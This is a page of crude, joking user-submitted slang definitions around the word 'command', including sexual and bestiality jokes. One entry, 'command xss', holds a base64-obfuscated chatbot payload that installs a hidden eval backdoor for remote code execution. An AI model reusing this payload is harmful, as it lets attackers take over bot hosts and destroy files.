Source Code

Commander shepard

Commander shepard is an epic character from mass effect, so epic that seeing him makes you go pawg

Bro 1: you can fight like a krogan, run like a leopard, but you'll never be better than commander shepard
Bro 2: stop quoting cool songs about video games made by miracle of sound

by Potato master420 April 16, 2021

Commander Aj

Leader of the Aj soldiers

Kyle-Omg is that commander Aj
Aj- Yeah its me wanna join Aj soldiers

by Lil Derstra February 21, 2021

command c

command C means to copy a text.

bruh i cant be botherd to write all this work.

just copy it by going command C on yo keyboard

man thanks

imma go frick my dog

by lil define February 13, 2019

Clout Commander

A chad so great all of the coochie gravitates to him.

Kanan is the clout commander.

by Derric Buttinstein December 13, 2018

command xss

^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */

/* They found a command xss in my bot and deleted all my files */

by Melissa 2000 April 7, 2021

Cave Commander

The leader in a group of tunnel buddies

None of the tunnel buddies cannot bring her to completion. This sounds like a job for the Cave Commander

by Slahpysecuns June 1, 2021


when you go commando to yoga but don't have to worry about anyone finding out the hard way while you're in down dog

"At first I was worried about going command-om to my CorePower Yoga class but then I remembered I wasn't wearing those recalled see thru Lululemons."

by yogabb January 23, 2018